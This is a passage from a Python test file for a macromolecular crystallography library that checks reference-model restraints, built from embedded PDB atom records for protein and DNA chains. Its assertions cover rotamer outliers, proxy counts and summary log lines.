ATOM 6377 CB VAL K 333 0.342 67.942 51.562 1.00126.37 C
ATOM 6378 N SER K 334 -2.318 69.535 50.968 1.00156.08 N
ATOM 6379 CA SER K 334 -3.687 69.866 51.335 1.00158.16 C
ATOM 6380 C SER K 334 -4.197 69.116 52.555 1.00157.55 C
ATOM 6381 O SER K 334 -4.066 67.905 52.664 1.00161.93 O
ATOM 6382 CB SER K 334 -4.630 69.614 50.166 1.00162.09 C
ATOM 6383 OG SER K 334 -5.836 69.041 50.632 1.00170.98 O
END
"""
pdb_str_ref = """\
CRYST1 117.739 195.224 119.094 90.00 101.60 90.00 P 1 21 1
ATOM 1 N THR G 332 4.195 72.012 51.895 1.00171.28 N
ATOM 2 CA THR G 332 2.946 71.699 52.580 1.00153.71 C
ATOM 3 C THR G 332 1.980 70.971 51.651 1.00132.45 C
ATOM 4 O THR G 332 2.092 71.062 50.429 1.00130.38 O
ATOM 5 CB THR G 332 2.291 72.982 53.125 1.00 20.00 C
ATOM 6 OG1 THR G 332 2.036 73.887 52.046 1.00 20.00 O
ATOM 7 CG2 THR G 332 3.269 73.749 54.003 1.00 20.00 C
ATOM 8 N VAL G 333 1.033 70.248 52.240 1.00121.58 N
ATOM 9 CA VAL G 333 0.047 69.503 51.468 1.00129.11 C
ATOM 10 C VAL G 333 -1.363 69.905 51.883 1.00146.57 C
ATOM 11 O VAL G 333 -1.552 70.599 52.882 1.00151.92 O
ATOM 12 CB VAL G 333 0.216 67.983 51.643 1.00 20.00 C
ATOM 13 CG1 VAL G 333 -0.905 67.237 50.935 1.00 20.00 C
ATOM 14 CG2 VAL G 333 1.574 67.534 51.125 1.00 20.00 C
ATOM 15 N SER G 334 -2.351 69.465 51.111 1.00156.08 N
ATOM 16 CA SER G 334 -3.745 69.778 51.397 1.00158.16 C
ATOM 17 C SER G 334 -4.297 68.870 52.492 1.00157.55 C
ATOM 18 O SER G 334 -3.964 67.686 52.556 1.00161.93 O
ATOM 19 CB SER G 334 -4.595 69.652 50.131 1.00162.09 C
ATOM 20 OG SER G 334 -5.954 69.950 50.396 1.00170.98 O
"""
params_text = """\
reference_model {
reference_group {
reference = chain 'G'
selection = chain 'K'
file_name = "ref.pdb"
}
}
"""
ref_file = open("ref.pdb", 'w')
ref_file.write(pdb_str_ref)
ref_file.close()
log = cStringIO.StringIO()
# log = sys.stdout
# orig_file = open("start.pdb", "w")
# orig_file.write(pdb_str_original)
# orig_file.close()
def_pars = reference_model_params
pars = iotbx.phil.parse(params_text)
all_pars = def_pars.fetch(pars).extract()
all_pars.reference_model.enabled = True
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
rm = reference_model(
model=model,
reference_file_list=['ref.pdb'],
params=all_pars.reference_model,
log=log)
rm.show_reference_summary(log=log)
new_h = pdb_h.deep_copy()
xray_structure = new_h.extract_xray_structure()
rm.set_rotamer_to_reference(
xray_structure=xray_structure)
new_h.adopt_xray_structure(xray_structure)
r1 = rotalyze(pdb_hierarchy=new_h, outliers_only=False)
assert r1.n_outliers == 0
def exercise_dna(mon_lib_srv, ener_lib):
pdb_str_original = """\
CRYST1 25.287 40.217 65.471 90.00 90.00 90.00 P 21 21 21 8
SCALE1 0.039546 0.000000 0.000000 0.00000
SCALE2 0.000000 0.024865 0.000000 0.00000
SCALE3 0.000000 0.000000 0.015274 0.00000
ATOM 80 P DA A 5 -8.062 -5.965 -15.755 1.00 42.17 P
ATOM 81 OP1 DA A 5 -8.426 -7.228 -16.405 1.00 50.61 O
ATOM 82 OP2 DA A 5 -8.689 -5.557 -14.457 1.00 51.75 O
ATOM 83 O5' DA A 5 -6.496 -5.961 -15.638 1.00 34.89 O
ATOM 84 C5' DA A 5 -5.791 -6.321 -16.790 1.00 30.71 C
ATOM 85 C4' DA A 5 -4.355 -5.917 -16.600 1.00 34.43 C
ATOM 86 O4' DA A 5 -4.303 -4.509 -16.239 1.00 33.96 O
ATOM 87 C3' DA A 5 -3.630 -6.687 -15.491 1.00 35.56 C
ATOM 88 O3' DA A 5 -2.407 -7.257 -16.020 1.00 33.08 O
ATOM 89 C2' DA A 5 -3.531 -5.654 -14.384 1.00 32.41 C
ATOM 90 C1' DA A 5 -3.435 -4.334 -15.130 1.00 28.44 C
ATOM 91 N9 DA A 5 -3.904 -3.143 -14.449 1.00 28.37 N
ATOM 92 C8 DA A 5 -5.187 -2.933 -14.022 1.00 27.53 C
ATOM 93 N7 DA A 5 -5.401 -1.724 -13.565 1.00 29.33 N
ATOM 94 C5 DA A 5 -4.187 -1.082 -13.747 1.00 23.78 C
ATOM 95 C6 DA A 5 -3.761 0.226 -13.474 1.00 25.22 C
ATOM 96 N6 DA A 5 -4.519 1.150 -12.896 1.00 25.69 N
ATOM 97 N1 DA A 5 -2.485 0.535 -13.749 1.00 24.39 N
ATOM 98 C2 DA A 5 -1.712 -0.389 -14.320 1.00 24.89 C
ATOM 99 N3 DA A 5 -2.001 -1.641 -14.653 1.00 28.33 N
ATOM 100 C4 DA A 5 -3.268 -1.935 -14.326 1.00 27.45 C
ATOM 101 P DA A 6 -1.382 -8.057 -15.083 1.00 33.49 P
ATOM 102 OP1 DA A 6 -0.596 -8.971 -15.989 1.00 35.26 O
ATOM 103 OP2 DA A 6 -2.097 -8.481 -13.890 1.00 34.48 O
ATOM 104 O5' DA A 6 -0.480 -6.949 -14.401 1.00 31.72 O
ATOM 105 C5' DA A 6 0.398 -6.138 -15.188 1.00 28.12 C
ATOM 106 C4' DA A 6 1.219 -5.272 -14.269 1.00 22.57 C
ATOM 107 O4' DA A 6 0.380 -4.203 -13.784 1.00 23.34 O
ATOM 108 C3' DA A 6 1.783 -5.982 -13.049 1.00 23.61 C
ATOM 109 O3' DA A 6 3.202 -5.785 -13.150 1.00 22.60 O
ATOM 110 C2' DA A 6 1.110 -5.289 -11.881 1.00 22.21 C
ATOM 111 C1' DA A 6 0.653 -3.958 -12.418 1.00 20.89 C
ATOM 112 N9 DA A 6 -0.561 -3.398 -11.831 1.00 21.71 N
ATOM 113 C8 DA A 6 -1.777 -4.017 -11.666 1.00 23.62 C
ATOM 114 N7 DA A 6 -2.693 -3.249 -11.139 1.00 23.57 N
ATOM 115 C5 DA A 6 -2.071 -2.016 -11.029 1.00 20.29 C
ATOM 116 C6 DA A 6 -2.506 -0.774 -10.519 1.00 20.33 C
ATOM 117 N6 DA A 6 -3.763 -0.525 -10.122 1.00 20.36 N
ATOM 118 N1 DA A 6 -1.604 0.233 -10.486 1.00 20.84 N
ATOM 119 C2 DA A 6 -0.341 -0.023 -10.868 1.00 21.15 C
ATOM 120 N3 DA A 6 0.174 -1.126 -11.378 1.00 22.91 N
ATOM 121 C4 DA A 6 -0.746 -2.101 -11.433 1.00 20.00 C
ATOM 122 P DT A 7 4.283 -6.215 -12.051 1.00 23.53 P
ATOM 123 OP1 DT A 7 5.598 -6.398 -12.780 1.00 27.73 O
ATOM 124 OP2 DT A 7 3.774 -7.297 -11.205 1.00 24.18 O
ATOM 125 O5' DT A 7 4.350 -4.948 -11.106 1.00 22.94 O
ATOM 126 C5' DT A 7 4.668 -3.709 -11.633 1.00 21.30 C
ATOM 127 C4' DT A 7 4.525 -2.656 -10.580 1.00 20.84 C
ATOM 128 O4' DT A 7 3.138 -2.512 -10.296 1.00 19.94 O
ATOM 129 C3' DT A 7 5.205 -2.966 -9.250 1.00 20.02 C
ATOM 130 O3' DT A 7 6.280 -2.035 -9.099 1.00 23.74 O
ATOM 131 C2' DT A 7 4.144 -2.717 -8.200 1.00 19.47 C
ATOM 132 C1' DT A 7 3.048 -2.015 -8.962 1.00 20.12 C
ATOM 133 N1 DT A 7 1.641 -2.197 -8.524 1.00 20.27 N
ATOM 134 C2 DT A 7 0.957 -1.108 -8.030 1.00 18.61 C
ATOM 135 O2 DT A 7 1.430 0.017 -7.926 1.00 19.56 O
ATOM 136 N3 DT A 7 -0.344 -1.365 -7.721 1.00 18.89 N
ATOM 137 C4 DT A 7 -1.018 -2.563 -7.836 1.00 21.94 C
ATOM 138 O4 DT A 7 -2.200 -2.640 -7.497 1.00 23.57 O
ATOM 139 C5 DT A 7 -0.226 -3.674 -8.271 1.00 18.09 C
ATOM 140 C7 DT A 7 -0.860 -5.022 -8.351 1.00 19.35 C
ATOM 141 C6 DT A 7 1.065 -3.446 -8.562 1.00 17.66 C
ATOM 142 P DT A 8 7.284 -1.980 -7.857 1.00 26.43 P
ATOM 143 OP1 DT A 8 8.611 -1.444 -8.278 1.00 28.45 O
ATOM 144 OP2 DT A 8 7.248 -3.298 -7.198 1.00 27.17 O
ATOM 145 O5' DT A 8 6.613 -0.927 -6.882 1.00 25.09 O
ATOM 146 C5' DT A 8 6.357 0.403 -7.340 1.00 24.67 C
ATOM 147 C4' DT A 8 5.543 1.125 -6.301 1.00 23.10 C
ATOM 148 O4' DT A 8 4.228 0.541 -6.229 1.00 23.60 O
ATOM 149 C3' DT A 8 6.127 1.057 -4.884 1.00 25.21 C
ATOM 150 O3' DT A 8 6.507 2.380 -4.493 1.00 28.93 O
ATOM 151 C2' DT A 8 5.018 0.434 -4.050 1.00 23.32 C
ATOM 152 C1' DT A 8 3.795 0.667 -4.883 1.00 22.06 C
ATOM 153 N1 DT A 8 2.713 -0.291 -4.689 1.00 19.79 N
ATOM 154 C2 DT A 8 1.466 0.223 -4.414 1.00 18.40 C
ATOM 155 O2 DT A 8 1.263 1.399 -4.157 1.00 20.56 O
ATOM 156 N3 DT A 8 0.484 -0.716 -4.337 1.00 19.20 N
ATOM 157 C4 DT A 8 0.588 -2.075 -4.597 1.00 18.45 C
ATOM 158 O4 DT A 8 -0.397 -2.789 -4.538 1.00 21.38 O
ATOM 159 C5 DT A 8 1.920 -2.549 -4.859 1.00 17.02 C
ATOM 160 C7 DT A 8 2.126 -4.006 -5.116 1.00 20.50 C
ATOM 161 C6 DT A 8 2.895 -1.634 -4.959 1.00 19.29 C
TER 245 DG A 12
ATOM 325 P DA B 17 -10.220 1.260 -1.207 1.00 27.94 P
ATOM 326 OP1 DA B 17 -11.370 2.143 -0.856 1.00 34.83 O
ATOM 327 OP2 DA B 17 -10.221 0.599 -2.553 1.00 31.17 O
ATOM 328 O5' DA B 17 -8.842 2.020 -1.098 1.00 26.12 O
ATOM 329 C5' DA B 17 -8.558 2.683 0.094 1.00 25.41 C
ATOM 330 C4' DA B 17 -7.407 3.619 -0.107 1.00 26.38 C
ATOM 331 O4' DA B 17 -6.208 2.886 -0.440 1.00 24.41 O
ATOM 332 C3' DA B 17 -7.600 4.631 -1.214 1.00 27.57 C
ATOM 333 O3' DA B 17 -6.972 5.834 -0.764 1.00 29.89 O
ATOM 334 C2' DA B 17 -6.902 3.980 -2.406 1.00 26.29 C
ATOM 335 C1' DA B 17 -5.771 3.225 -1.781 1.00 23.13 C
ATOM 336 N9 DA B 17 -5.444 1.986 -2.460 1.00 22.66 N
ATOM 337 C8 DA B 17 -6.295 0.942 -2.750 1.00 23.38 C
ATOM 338 N7 DA B 17 -5.700 -0.094 -3.288 1.00 20.62 N
ATOM 339 C5 DA B 17 -4.344 0.242 -3.234 1.00 20.59 C
ATOM 340 C6 DA B 17 -3.178 -0.447 -3.603 1.00 17.89 C
ATOM 341 N6 DA B 17 -3.184 -1.685 -4.072 1.00 20.22 N
ATOM 342 N1 DA B 17 -1.995 0.205 -3.497 1.00 19.61 N
ATOM 343 C2 DA B 17 -1.992 1.465 -3.030 1.00 20.38 C
ATOM 344 N3 DA B 17 -3.021 2.207 -2.621 1.00 20.80 N
ATOM 345 C4 DA B 17 -4.182 1.540 -2.774 1.00 19.17 C
ATOM 346 P DA B 18 -6.994 7.132 -1.670 1.00 32.91 P
ATOM 347 OP1 DA B 18 -6.817 8.281 -0.798 1.00 37.55 O
ATOM 348 OP2 DA B 18 -8.060 7.037 -2.636 1.00 31.04 O
ATOM 349 O5' DA B 18 -5.659 7.052 -2.535 1.00 30.20 O
ATOM 350 C5' DA B 18 -4.377 7.074 -1.958 1.00 30.19 C
ATOM 351 C4' DA B 18 -3.354 6.838 -3.036 1.00 28.09 C
ATOM 352 O4' DA B 18 -3.424 5.481 -3.484 1.00 26.27 O
ATOM 353 C3' DA B 18 -3.545 7.708 -4.286 1.00 29.73 C
ATOM 354 O3' DA B 18 -2.469 8.627 -4.273 1.00 34.73 O
ATOM 355 C2' DA B 18 -3.566 6.715 -5.433 1.00 27.32 C
ATOM 356 C1' DA B 18 -3.010 5.448 -4.841 1.00 24.83 C
ATOM 357 N9 DA B 18 -3.488 4.196 -5.410 1.00 23.72 N
ATOM 358 C8 DA B 18 -4.794 3.799 -5.530 1.00 20.51 C
ATOM 359 N7 DA B 18 -4.937 2.581 -5.985 1.00 22.85 N
ATOM 360 C5 DA B 18 -3.636 2.147 -6.189 1.00 20.87 C
ATOM 361 C6 DA B 18 -3.111 0.950 -6.675 1.00 19.34 C
ATOM 362 N6 DA B 18 -3.852 -0.099 -7.028 1.00 21.88 N
ATOM 363 N1 DA B 18 -1.767 0.849 -6.776 1.00 19.77 N
ATOM 364 C2 DA B 18 -1.023 1.872 -6.374 1.00 21.42 C
ATOM 365 N3 DA B 18 -1.392 3.050 -5.910 1.00 22.19 N
ATOM 366 C4 DA B 18 -2.734 3.129 -5.836 1.00 21.41 C
ATOM 367 P DT B 19 -2.064 9.546 -5.497 1.00 40.82 P
ATOM 368 OP1 DT B 19 -1.281 10.615 -4.939 1.00 44.52 O
ATOM 369 OP2 DT B 19 -3.292 9.787 -6.271 1.00 44.69 O
ATOM 370 O5' DT B 19 -1.119 8.619 -6.355 1.00 30.72 O
ATOM 371 C5' DT B 19 0.059 8.093 -5.804 1.00 29.16 C
ATOM 372 C4' DT B 19 0.704 7.195 -6.832 1.00 26.15 C
ATOM 373 O4' DT B 19 -0.129 6.045 -7.087 1.00 26.00 O
ATOM 374 C3' DT B 19 0.941 7.859 -8.188 1.00 25.98 C
ATOM 375 O3' DT B 19 2.343 7.877 -8.376 1.00 30.07 O
ATOM 376 C2' DT B 19 0.207 6.968 -9.181 1.00 26.77 C
ATOM 377 C1' DT B 19 0.036 5.665 -8.443 1.00 25.87 C
ATOM 378 N1 DT B 19 -1.122 4.839 -8.816 1.00 24.60 N
ATOM 379 C2 DT B 19 -0.906 3.556 -9.283 1.00 22.21 C
ATOM 380 O2 DT B 19 0.197 3.084 -9.451 1.00 22.06 O
ATOM 381 N3 DT B 19 -2.038 2.833 -9.519 1.00 22.04 N
ATOM 382 C4 DT B 19 -3.339 3.262 -9.380 1.00 21.81 C
ATOM 383 O4 DT B 19 -4.247 2.495 -9.615 1.00 24.16 O
ATOM 384 C5 DT B 19 -3.499 4.613 -8.891 1.00 22.25 C
ATOM 385 C7 DT B 19 -4.879 5.143 -8.663 1.00 23.26 C
ATOM 386 C6 DT B 19 -2.396 5.327 -8.640 1.00 22.85 C
ATOM 387 P DT B 20 3.005 8.456 -9.725 1.00 32.03 P
ATOM 388 OP1 DT B 20 4.339 8.958 -9.284 1.00 35.31 O
ATOM 389 OP2 DT B 20 2.027 9.351 -10.442 1.00 33.99 O
ATOM 390 O5' DT B 20 3.144 7.102 -10.543 1.00 31.33 O
ATOM 391 C5' DT B 20 3.894 5.979 -10.032 1.00 28.60 C
ATOM 392 C4' DT B 20 3.851 4.840 -11.020 1.00 28.63 C
ATOM 393 O4' DT B 20 2.494 4.361 -11.145 1.00 26.47 O
ATOM 394 C3' DT B 20 4.300 5.211 -12.437 1.00 31.59 C
ATOM 395 O3' DT B 20 5.260 4.256 -12.875 1.00 39.07 O
ATOM 396 C2' DT B 20 3.027 5.147 -13.257 1.00 26.06 C
ATOM 397 C1' DT B 20 2.211 4.120 -12.529 1.00 24.42 C
ATOM 398 N1 DT B 20 0.757 4.123 -12.660 1.00 23.79 N
ATOM 399 C2 DT B 20 0.138 2.932 -12.972 1.00 25.04 C
ATOM 400 O2 DT B 20 0.741 1.921 -13.262 1.00 24.66 O
ATOM 401 N3 DT B 20 -1.229 2.977 -12.959 1.00 25.84 N
ATOM 402 C4 DT B 20 -2.022 4.071 -12.671 1.00 25.98 C
ATOM 403 O4 DT B 20 -3.234 3.948 -12.646 1.00 28.14 O
ATOM 404 C5 DT B 20 -1.311 5.298 -12.387 1.00 22.81 C
ATOM 405 C7 DT B 20 -2.094 6.540 -12.092 1.00 27.47 C
ATOM 406 C6 DT B 20 0.028 5.263 -12.401 1.00 26.29 C
TER 490 DG B 24
"""
params_text = """\
reference_model {
reference_group {
reference = chain 'A'
selection = chain 'A'
file_name = "ref.pdb"
}
reference_group {
reference = chain 'B'
selection = chain 'B'
file_name = "ref.pdb"
}
}
"""
ref_file = open("ref.pdb", 'w')
ref_file.write(pdb_str_original)
ref_file.close()
log = cStringIO.StringIO()
# log = sys.stdout
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
for include_chains in [True, False]:
def_pars = reference_model_params
pars = iotbx.phil.parse(params_text)
all_pars = None
if include_chains:
all_pars = def_pars.fetch(pars).extract()
all_pars.reference_model.enabled = True
else:
all_pars = def_pars.extract()
all_pars.reference_model.enabled = True
all_pars.reference_model.file = "ref.pdb"
rm = reference_model(
model=model,
reference_file_list=['ref.pdb'],
params=all_pars.reference_model,
log=log)
rm.show_reference_summary(log=log)
assert rm.get_n_proxies() == 74, \
"Expecting 74 proxies, got %d" % rm.get_n_proxies()
log_strings = log.getvalue().split("\n")
for needed_string in [
" DA A 5 <=====> DA A 5",
" DA A 6 <=====> DA A 6",
" DT A 7 <=====> DT A 7",
" DT A 8 <=====> DT A 8",
" DA B 17 <=====> DA B 17",
" DA B 18 <=====> DA B 18",
" DT B 19 <=====> DT B 19",
" DT B 20 <=====> DT B 20",
]:
assert needed_string in log_strings, "'%s' not in log!" % needed_string
def exercise_3chains_self(mon_lib_srv, ener_lib):
"""
Test reference model, 3 chains, reference is the same and selections are
supposed to be mixed, like ref=(A or Bref or C) sel=(Aref, B, Cref) """
pdb_str_original = """\
CRYST1 129.069 83.165 84.393 90.00 90.00 90.00 P 1
ATOM 1 N GLN A 1 118.638 78.165 29.859 1.00 32.70 A N
ATOM 2 CA GLN A 1 118.742 77.022 30.759 1.00 34.10 A C
ATOM 3 CB GLN A 1 117.844 77.222 31.984 1.00 34.85 A C
ATOM 4 CG GLN A 1 118.008 76.159 33.064 1.00 36.31 A C
ATOM 5 CD GLN A 1 117.167 76.441 34.295 1.00 37.02 A C
ATOM 6 OE1 GLN A 1 116.477 77.458 34.372 1.00 36.35 A O
ATOM 7 NE2 GLN A 1 117.221 75.538 35.268 1.00 38.45 A N
ATOM 8 C GLN A 1 118.377 75.725 30.039 1.00 35.48 A C
ATOM 9 O GLN A 1 119.251 75.008 29.552 1.00 35.59 A O
ATOM 10 N VAL A 2 117.083 75.432 29.969 1.00 36.49 A N
ATOM 11 CA VAL A 2 116.607 74.213 29.327 1.00 37.63 A C
ATOM 12 CB VAL A 2 115.168 73.893 29.751 1.00 38.86 A C
ATOM 13 CG1 VAL A 2 114.654 72.672 29.006 1.00 39.72 A C
ATOM 14 CG2 VAL A 2 115.096 73.682 31.255 1.00 39.93 A C
ATOM 15 C VAL A 2 116.698 74.327 27.811 1.00 36.86 A C
ATOM 16 O VAL A 2 116.042 75.175 27.207 1.00 36.25 A O
ATOM 17 N GLN A 3 117.506 73.466 27.200 1.00 37.05 A N
ATOM 18 CA GLN A 3 117.678 73.479 25.752 1.00 36.50 A C
ATOM 19 CB GLN A 3 118.915 74.294 25.365 1.00 35.23 A C
ATOM 20 CG GLN A 3 118.741 75.798 25.481 1.00 33.97 A C
ATOM 21 CD GLN A 3 119.955 76.561 24.994 1.00 32.60 A C
ATOM 22 OE1 GLN A 3 120.999 75.974 24.707 1.00 32.65 A O
ATOM 23 NE2 GLN A 3 119.823 77.879 24.893 1.00 31.40 A N
ATOM 24 C GLN A 3 117.794 72.072 25.176 1.00 37.49 A C
ATOM 25 O GLN A 3 118.315 71.161 25.827 1.00 38.37 A O
ATOM 26 N LEU A 4 117.302 71.907 23.951 1.00 37.44 A N
ATOM 27 CA LEU A 4 117.424 70.652 23.217 1.00 38.27 A C
ATOM 28 CB LEU A 4 116.107 69.872 23.227 1.00 39.05 A C
ATOM 29 CG LEU A 4 115.539 69.386 24.562 1.00 39.82 A C
ATOM 30 CD1 LEU A 4 114.720 70.467 25.254 1.00 39.45 A C
ATOM 31 CD2 LEU A 4 114.704 68.133 24.355 1.00 40.68 A C
ATOM 32 C LEU A 4 117.854 70.938 21.778 1.00 37.77 A C
ATOM 33 O LEU A 4 117.369 71.884 21.157 1.00 37.07 A O
ATOM 34 N LYS A 5 118.763 70.124 21.249 1.00 38.27 A N
ATOM 35 CA LYS A 5 119.265 70.333 19.895 1.00 37.96 A C
ATOM 36 CB LYS A 5 120.574 71.123 19.931 1.00 37.03 A C
ATOM 37 CG LYS A 5 121.114 71.505 18.561 1.00 36.53 A C
ATOM 38 CD LYS A 5 122.352 72.380 18.680 1.00 35.38 A C
ATOM 39 CE LYS A 5 122.875 72.783 17.311 1.00 34.77 A C
ATOM 40 NZ LYS A 5 124.069 73.666 17.413 1.00 33.45 A N
ATOM 41 C LYS A 5 119.467 69.009 19.161 1.00 39.11 A C
ATOM 42 O LYS A 5 120.063 68.075 19.695 1.00 39.98 A O
ATOM 43 N GLU A 6 118.969 68.936 17.931 1.00 39.24 A N
ATOM 44 CA GLU A 6 119.059 67.716 17.133 1.00 40.35 A C
ATOM 45 CB GLU A 6 117.809 67.541 16.267 1.00 40.77 A C
ATOM 46 CG GLU A 6 116.518 67.353 17.046 1.00 40.94 A C
ATOM 47 CD GLU A 6 115.905 68.664 17.505 1.00 39.97 A C
ATOM 48 OE1 GLU A 6 116.574 69.714 17.400 1.00 39.09 A O
ATOM 49 OE2 GLU A 6 114.743 68.644 17.962 1.00 40.09 A O
ATOM 50 C GLU A 6 120.296 67.709 16.241 1.00 40.24 A C
ATOM 51 O GLU A 6 120.601 68.697 15.574 1.00 39.29 A O
ATOM 52 N SER A 7 121.001 66.584 16.234 1.00 41.20 A N
ATOM 53 CA SER A 7 122.160 66.398 15.370 1.00 41.10 A C
ATOM 54 CB SER A 7 123.431 66.187 16.197 1.00 41.10 A C
ATOM 55 OG SER A 7 123.701 67.308 17.023 1.00 40.11 A O
ATOM 56 C SER A 7 121.930 65.211 14.444 1.00 42.23 A C
ATOM 57 O SER A 7 121.956 64.061 14.881 1.00 43.35 A O
ATOM 58 N GLY A 8 121.697 65.499 13.167 1.00 42.03 A N
ATOM 59 CA GLY A 8 121.422 64.464 12.188 1.00 43.17 A C
ATOM 60 C GLY A 8 122.302 64.540 10.956 1.00 42.71 A C
ATOM 61 O GLY A 8 123.142 65.433 10.843 1.00 41.37 A O
ATOM 62 N PRO A 9 122.117 63.592 10.024 1.00 43.74 A N
ATOM 63 CD PRO A 9 121.218 62.434 10.175 1.00 45.40 A C
ATOM 64 CA PRO A 9 122.906 63.513 8.790 1.00 43.28 A C
ATOM 65 CB PRO A 9 122.804 62.037 8.414 1.00 44.75 A C
ATOM 66 CG PRO A 9 121.465 61.631 8.919 1.00 46.12 A C
ATOM 67 C PRO A 9 122.361 64.390 7.666 1.00 42.79 A C
ATOM 68 O PRO A 9 123.122 64.826 6.800 1.00 41.70 A O
ATOM 69 N GLY A 10 121.055 64.637 7.679 1.00 43.56 A N
ATOM 70 CA GLY A 10 120.425 65.454 6.659 1.00 43.32 A C
ATOM 71 C GLY A 10 119.971 64.668 5.445 1.00 44.47 A C
ATOM 72 O GLY A 10 118.831 64.801 5.000 1.00 45.36 A O
TER
ATOM 1645 N ASP B 1 94.462 51.713 21.314 1.00 38.68 B N
ATOM 1646 CA ASP B 1 94.907 52.727 20.365 1.00 39.77 B C
ATOM 1647 CB ASP B 1 94.995 52.139 18.956 1.00 40.01 B C
ATOM 1648 CG ASP B 1 95.754 53.035 18.000 1.00 41.28 B C
ATOM 1649 OD1 ASP B 1 96.565 53.857 18.476 1.00 41.67 B O
ATOM 1650 OD2 ASP B 1 95.544 52.913 16.774 1.00 41.91 B O
ATOM 1651 C ASP B 1 93.966 53.928 20.386 1.00 40.53 B C
ATOM 1652 O ASP B 1 92.746 53.766 20.440 1.00 40.33 B O
ATOM 1653 N ILE B 2 94.537 55.130 20.341 1.00 41.47 B N
ATOM 1654 CA ILE B 2 93.756 56.358 20.452 1.00 42.47 B C
ATOM 1655 CB ILE B 2 94.214 57.190 21.663 1.00 42.52 B C
ATOM 1656 CG2 ILE B 2 93.396 58.470 21.778 1.00 43.79 B C
ATOM 1657 CG1 ILE B 2 94.108 56.362 22.947 1.00 41.45 B C
ATOM 1658 CD1 ILE B 2 94.570 57.093 24.191 1.00 41.67 B C
ATOM 1659 C ILE B 2 93.841 57.180 19.168 1.00 43.93 B C
ATOM 1660 O ILE B 2 94.928 57.405 18.636 1.00 44.25 B O
ATOM 1661 N VAL B 3 92.687 57.629 18.680 1.00 45.00 B N
ATOM 1662 CA VAL B 3 92.612 58.382 17.432 1.00 46.83 B C
ATOM 1663 CB VAL B 3 91.712 57.671 16.414 1.00 47.07 B C
ATOM 1664 CG1 VAL B 3 91.747 58.390 15.074 1.00 49.24 B C
ATOM 1665 CG2 VAL B 3 92.136 56.224 16.262 1.00 45.38 B C
ATOM 1666 C VAL B 3 92.111 59.799 17.681 1.00 48.52 B C
ATOM 1667 O VAL B 3 91.117 60.002 18.375 1.00 48.59 B O
ATOM 1668 N MET B 4 92.799 60.776 17.099 1.00 49.99 B N
ATOM 1669 CA MET B 4 92.460 62.181 17.296 1.00 51.83 B C
ATOM 1670 CB MET B 4 93.658 62.944 17.866 1.00 51.35 B C
ATOM 1671 CG MET B 4 94.339 62.254 19.040 1.00 48.92 B C
ATOM 1672 SD MET B 4 93.360 62.268 20.552 1.00 48.39 B S
ATOM 1673 CE MET B 4 93.448 63.998 20.987 1.00 49.97 B C
ATOM 1674 C MET B 4 92.005 62.828 15.992 1.00 54.57 B C
ATOM 1675 O MET B 4 92.701 62.758 14.979 1.00 55.32 B O
ATOM 1676 N SER B 5 90.836 63.461 16.023 1.00 56.25 B N
ATOM 1677 CA SER B 5 90.302 64.140 14.847 1.00 59.25 B C
ATOM 1678 CB SER B 5 89.052 63.420 14.334 1.00 59.12 B C
ATOM 1679 OG SER B 5 89.335 62.070 14.010 1.00 56.93 B O
ATOM 1680 C SER B 5 89.975 65.596 15.161 1.00 61.44 B C
ATOM 1681 O SER B 5 89.374 65.889 16.191 1.00 60.75 B O
ATOM 1682 N GLN B 6 90.363 66.508 14.274 1.00 64.02 B N
ATOM 1683 CA GLN B 6 90.108 67.930 14.492 1.00 65.54 B C
ATOM 1684 CB GLN B 6 91.422 68.711 14.520 1.00 64.95 B C
ATOM 1685 CG GLN B 6 92.351 68.313 15.648 1.00 62.00 B C
ATOM 1686 CD GLN B 6 93.557 69.221 15.762 1.00 61.07 B C
ATOM 1687 OE1 GLN B 6 94.648 68.778 16.125 1.00 58.90 B O
ATOM 1688 NE2 GLN B 6 93.368 70.500 15.458 1.00 62.20 B N
ATOM 1689 C GLN B 6 89.182 68.526 13.435 1.00 68.28 B C
ATOM 1690 O GLN B 6 89.240 68.157 12.261 1.00 69.90 B O
ATOM 1691 N SER B 7 88.332 69.456 13.861 1.00 68.57 B N
ATOM 1692 CA SER B 7 87.413 70.129 12.949 1.00 70.24 B C
ATOM 1693 CB SER B 7 86.049 69.433 12.944 1.00 69.94 B C
ATOM 1694 OG SER B 7 86.154 68.099 12.477 1.00 69.41 B O
ATOM 1695 C SER B 7 87.253 71.595 13.333 1.00 69.83 B C
ATOM 1696 O SER B 7 87.048 71.909 14.503 1.00 68.66 B O
ATOM 1697 N PRO B 8 87.340 72.500 12.345 1.00 70.37 B N
ATOM 1698 CD PRO B 8 87.103 73.940 12.555 1.00 69.33 B C
ATOM 1699 CA PRO B 8 87.579 72.191 10.932 1.00 71.70 B C
ATOM 1700 CB PRO B 8 86.996 73.407 10.217 1.00 71.69 B C
ATOM 1701 CG PRO B 8 87.247 74.525 11.170 1.00 69.92 B C
ATOM 1702 C PRO B 8 89.059 72.030 10.600 1.00 71.13 B C
ATOM 1703 O PRO B 8 89.910 72.310 11.444 1.00 69.82 B O
ATOM 1704 N SER B 9 89.354 71.585 9.382 1.00 71.87 B N
ATOM 1705 CA SER B 9 90.732 71.404 8.940 1.00 70.91 B C
ATOM 1706 CB SER B 9 90.775 70.616 7.629 1.00 71.45 B C
ATOM 1707 OG SER B 9 89.977 71.234 6.633 1.00 71.72 B O
ATOM 1708 C SER B 9 91.432 72.749 8.770 1.00 69.14 B C
ATOM 1709 O SER B 9 92.628 72.878 9.037 1.00 67.60 B O
ATOM 1710 N SER B 10 90.677 73.747 8.324 1.00 69.19 B N
ATOM 1711 CA SER B 10 91.201 75.095 8.150 1.00 67.65 B C
ATOM 1712 CB SER B 10 92.017 75.200 6.860 1.00 66.83 B C
ATOM 1713 OG SER B 10 91.215 74.927 5.723 1.00 67.75 B O
ATOM 1714 C SER B 10 90.055 76.097 8.134 1.00 68.08 B C
ATOM 1715 O SER B 10 88.958 75.786 7.670 1.00 69.49 B O
TER
ATOM 3353 N GLN C 1 27.855 6.390 79.393 1.00 55.82 C N
ATOM 3354 CA GLN C 1 27.377 6.759 78.009 1.00 57.48 C C
ATOM 3355 CB GLN C 1 26.126 5.903 77.650 1.00 57.65 C C
ATOM 3356 CG GLN C 1 24.762 6.447 78.162 1.00 55.80 C C
ATOM 3357 CD GLN C 1 23.623 5.432 77.999 1.00 55.35 C C
